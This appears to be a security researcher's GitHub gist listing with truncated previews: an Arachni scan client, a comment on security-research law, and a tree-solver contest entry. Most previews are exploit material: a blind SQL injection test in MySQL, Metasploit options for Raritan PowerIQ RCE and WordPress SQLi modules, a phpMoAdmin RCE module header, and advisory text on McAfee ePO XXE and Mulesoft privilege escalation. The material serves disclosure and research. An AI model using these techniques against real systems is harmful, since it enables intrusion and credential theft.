Brandon Perry (brandonprry)

thought bleeding
View arachni.cs
using System;
using System.Threading;
class Program
{
    public static void Main (string[] args)
    {
        // Open an RPC session to the Arachni dispatcher (host, port, TLS) and start a scan
        using (ArachniSession session = new ArachniSession ("192.168.2.207", 4567, true)) {
            using (ArachniManager manager = new ArachniManager (session)) {
                var resp = manager.StartScan ("http://192.168.2.87/?searchquery=fdsa&action=search&x=11&y=15");
                // Poll every 10 seconds until the scan finishes, printing a progress dot each time
                while (manager.IsBusy ()) {
                    Thread.Sleep (10000);
                    Console.Write (".");
                }
            }
        }
    }
}
View gist:6c88f60bddabf99a11da

Comment regarding Class-25: Software – security research

Brandon Perry, VolatileMinds

Legislation concerning lawful security research requires consideration not only of the current state of software security, but also of the future of how we as Americans will consume and create software. Increasingly, software drives basic functions within each and every American’s daily life. Legislators and members of the security community have an excellent opportunity to create a framework that allows research by those with the capabilities and know-how to bolster the security of our homes, our businesses, and our infrastructure.

We live in a digital world now. Thirty years ago, when computer software was only beginning to be accepted by the mainstream public, legislators passed the Computer Fraud and Abuse Act. This was before the Internet of Everything was a gleam in anyone’s eye, and the notion of us running out of IP addresses was laughable. Now, we have critical infrastructure, smart home appliances, and even vehicle

View gist:ec85fb9e890a240b1579
mysql> select 1 from users where 'fdsa' rlike (select (case when (19>20) then 'a' else '|' end));
ERROR 1139 (42000): Got error 'empty (sub)expression' from regexp
mysql> select length((select name from users limit 0,1));
+--------------------------------------------+
| length((select name from users limit 0,1)) |
+--------------------------------------------+
|                                          5 |
+--------------------------------------------+
1 row in set (0.00 sec)
@brandonprry
brandonprry / gist:f83917e0fcc3bf3ccd6b
Last active Aug 29, 2015
Raritan PowerIQ 4.1/4.2/4.3 known session secret unauthenticated RCE
View gist:f83917e0fcc3bf3ccd6b
msf exploit(rails_secret_deserialization) > show options
Module options (exploit/multi/http/rails_secret_deserialization):
Name         Current Setting  Required  Description
----         ---------------  --------  -----------
COOKIE_NAME                   no        The name of the session cookie
DIGEST_NAME  SHA1             yes       The digest t
@brandonprry
brandonprry / phpmoadmin_rce.rb
Last active Aug 29, 2015
Quick metasploit module for possible phpMoAdmin 0day
View phpmoadmin_rce.rb
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
require 'rexml/document'
class Metasploit4 < Msf::Exploit::Remote
@brandonprry
brandonprry / wtreef
Created Feb 20, 2015
Small BST solver for contest at work. I think I cheated.
View wtreef
// Submitted by: Brandon Perry
// wtreef.cpp : Defines the entry point for the console application.
//
//Quick run:
/*
brandon.perry@BRANPERRY-X64 ~
$ time '/cygdrive/c/Users/brandon.perry/Documents/Visual Studio 2013/Projects/wtreef/Release/wtreef.exe'
Created a valid binary tree, but invalid BST. The tree was fixed and verified for 10 nodes.
Created a valid binary tree, but invalid BST. The tree was fixed and verified for 2010 nodes.
View gist:939bb8e969a57301ffc3
Module options (auxiliary/gather/wp_photogallery_users_sqli):
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
GALLERYID                   no        Gallery ID to use. If not provided, the module will attempt to bruteforce one.
Proxies                     no        Use a proxy chain
RHOST      172.31.16.30     yes       The target address
RPORT      80               yes       The target port
TARGETURI  /wordpress       yes       Relative URI of Wordpress installation
VHOST                       no        HTTP server virtual host
View gist:692e553975bf29aeaf2c
=begin
McAfee ePolicy Orchestrator Authenticated XXE and Credential Disclosure
Trial available here:
https://secure.mcafee.com/apps/downloads/free-evaluations/survey.aspx?mktg=ESD1172&cid=ESD1172&eval=A0C692FB-8E29-4D47-BBF1-43CAB5F10069&region=us
McAfee ePolicy Orchestrator suffers from an XXE vulnerability available to any authenticated user. The vulnerability lies in the Server Task Log option in the upper left menu. When creating a custom filter, a bit of XML is passed from the client to the server to create that filter. This parameter is called 'conditionXML' and is vulnerable to an XXE attack. However, the attack is somewhat limited, as only up to 255 characters fit in the 'value' field.
A file in the web server installation configuration directory called 'keystore.properties' is smaller than that limit, however, and contains an encrypted passphrase that is set during installation. When installing, an initial admin user is created (with 'admin' as the default userna
View gist:396aa6eda74a5aaa19ac
Mulesoft ESB Runtime 3.5.1 Authenticated Privilege Escalation → Remote Code Execution
Mulesoft ESB Runtime 3.5.1 allows any authenticated user to create an administrator user due to a missing permissions check in the handler/securityService.rpc endpoint. The following HTTP request can be made by any authenticated user, even one whose only role is Monitor.
POST /mmc-3.5.1/handler/securityService.rpc HTTP/1.1
Host: 192.168.0.22:8585
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5